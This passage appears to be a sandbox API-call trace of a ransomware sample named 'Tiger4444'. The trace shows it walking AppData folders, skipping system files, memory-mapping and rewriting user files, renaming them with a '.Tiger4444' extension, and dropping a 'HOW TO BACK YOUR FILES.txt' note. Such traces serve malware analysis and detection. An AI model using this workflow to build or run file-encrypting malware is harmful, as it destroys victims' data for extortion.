[0056.418] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0056.419] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0056.419] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0056.419] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0056.419] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14787208904) returned 1 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0056.419] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0056.419] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.421] CloseHandle (hObject=0x2cc) returned 1 [0056.421] CloseHandle (hObject=0x2b8) returned 1 [0056.421] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.Tiger4444") returned 81 [0056.421] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl.tiger4444"), dwFlags=0x1) returned 1 [0056.422] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e40435, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b1bddb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="Tiger4444.exe") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2=".") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="..") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="windows") returned -1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="bootmgr") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="pagefile.sys") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="boot") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ids.txt") returned 1 [0056.422] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="NTUSER.DAT") returned 1 [0056.422] lstrcpyW (in: lpString1=0x30aeb22, lpString2="TURABIAN.XSL" | out: lpString1="TURABIAN.XSL") returned="TURABIAN.XSL" [0056.422] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL", dwFileAttributes=0x0) returned 1 [0056.423] lstrlenW (lpString="TURABIAN.XSL") returned 12 [0056.423] lstrlenW (lpString="Tiger4444") returned 9 [0056.423] lstrcmpiW (lpString1="ABIAN.XSL", lpString2="Tiger4444") returned -1 [0056.423] lstrlenW (lpString=".dll") returned 4 [0056.423] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0056.423] lstrlenW (lpString=".lnk") returned 4 [0056.423] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0056.423] lstrlenW (lpString=".ini") returned 4 [0056.423] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0056.423] lstrlenW (lpString=".sys") returned 4 [0056.423] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0056.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0056.423] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0056.423] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14787635314) returned 1 [0056.423] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=344662) returned 1 [0056.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0056.423] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0056.423] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x54560, lpName=0x0) returned 0x2cc [0056.424] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x54560) returned 0xbe0000 [0056.567] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0056.567] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0056.567] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0056.567] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0056.567] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14802027903) returned 1 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0056.567] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0056.567] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.570] CloseHandle (hObject=0x2cc) returned 1 [0056.570] CloseHandle (hObject=0x2b8) returned 1 [0056.570] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.Tiger4444") returned 83 [0056.570] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl.tiger4444"), dwFlags=0x1) returned 1 [0056.571] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e40435, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b1bddb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0056.571] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0056.571] lstrcpyW (in: lpString1=0x30aeb22, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0056.572] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0056.572] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0056.573] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.573] CloseHandle (hObject=0x2b8) returned 1 [0056.573] CloseHandle (hObject=0x2c4) returned 1 [0056.573] GetCurrentThreadId () returned 0xfa8 [0056.573] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0056.573] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" [0056.573] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73980 | out: hHeap=0xc50000) returned 1 [0056.573] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0056.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" [0056.573] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\" [0056.573] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3" [0056.573] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\addins\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0056.618] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0056.715] FlushFileBuffers (hFile=0x2c4) returned 1 [0056.716] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.716] CloseHandle (hObject=0x2c4) returned 1 [0056.717] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned 48 [0056.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.717] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x86c46e80, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0056.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.717] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.717] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0056.717] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.717] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x86c46e80, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.717] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.717] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.717] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0056.717] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.717] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.717] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x86c46e80, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x86c46e80, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x86d2bcc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.717] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.717] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.717] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x86c46e80, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x86c46e80, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x86d2bcc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.717] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0056.717] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.717] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\addins\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0056.718] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0056.718] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0056.718] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.718] CloseHandle (hObject=0x2b8) returned 1 [0056.718] CloseHandle (hObject=0x2c4) returned 1 [0056.718] GetCurrentThreadId () returned 0xfa8 [0056.718] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0056.718] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" [0056.718] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0056.718] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0056.718] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" [0056.718] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\" [0056.718] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3" [0056.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0056.719] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0056.721] FlushFileBuffers (hFile=0x2c4) returned 1 [0056.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.723] CloseHandle (hObject=0x2c4) returned 1 [0056.724] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned 48 [0056.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9e4036f4, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x86d2bcc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0056.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.724] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.724] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0056.724] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.724] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9e4036f4, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x86d2bcc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.724] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.724] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.724] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0056.724] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.724] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.724] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x86d2bcc1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x86d2bcc1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x86d2bcc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.724] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.724] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.724] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33c5d8bc, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33c5d8bc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3f1c0c3d, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessCache.accdb", cAlternateFileName="ACCESS~1.ACC")) returned 1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="Tiger4444.exe") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2=".") returned 1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="..") returned 1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="windows") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="bootmgr") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="pagefile.sys") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="boot") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ids.txt") returned -1 [0056.724] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="NTUSER.DAT") returned -1 [0056.724] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="AccessCache.accdb" | out: lpString1="AccessCache.accdb") returned="AccessCache.accdb" [0056.725] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb", dwFileAttributes=0x0) returned 1 [0056.725] lstrlenW (lpString="AccessCache.accdb") returned 17 [0056.725] lstrlenW (lpString="Tiger4444") returned 9 [0056.725] lstrcmpiW (lpString1="che.accdb", lpString2="Tiger4444") returned -1 [0056.725] lstrlenW (lpString=".dll") returned 4 [0056.725] lstrcmpiW (lpString1="ccdb", lpString2=".dll") returned 1 [0056.725] lstrlenW (lpString=".lnk") returned 4 [0056.725] lstrcmpiW (lpString1="ccdb", lpString2=".lnk") returned 1 [0056.725] lstrlenW (lpString=".ini") returned 4 [0056.725] lstrcmpiW (lpString1="ccdb", lpString2=".ini") returned 1 [0056.725] lstrlenW (lpString=".sys") returned 4 [0056.725] lstrcmpiW (lpString1="ccdb", lpString2=".sys") returned 1 [0056.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0056.725] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0056.725] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14817838742) returned 1 [0056.725] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=200704) returned 1 [0056.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0056.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0056.725] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x31300, lpName=0x0) returned 0x2cc [0056.726] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x31300) returned 0xbe0000 [0057.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0057.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0057.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0057.174] RtlAllocateHeap 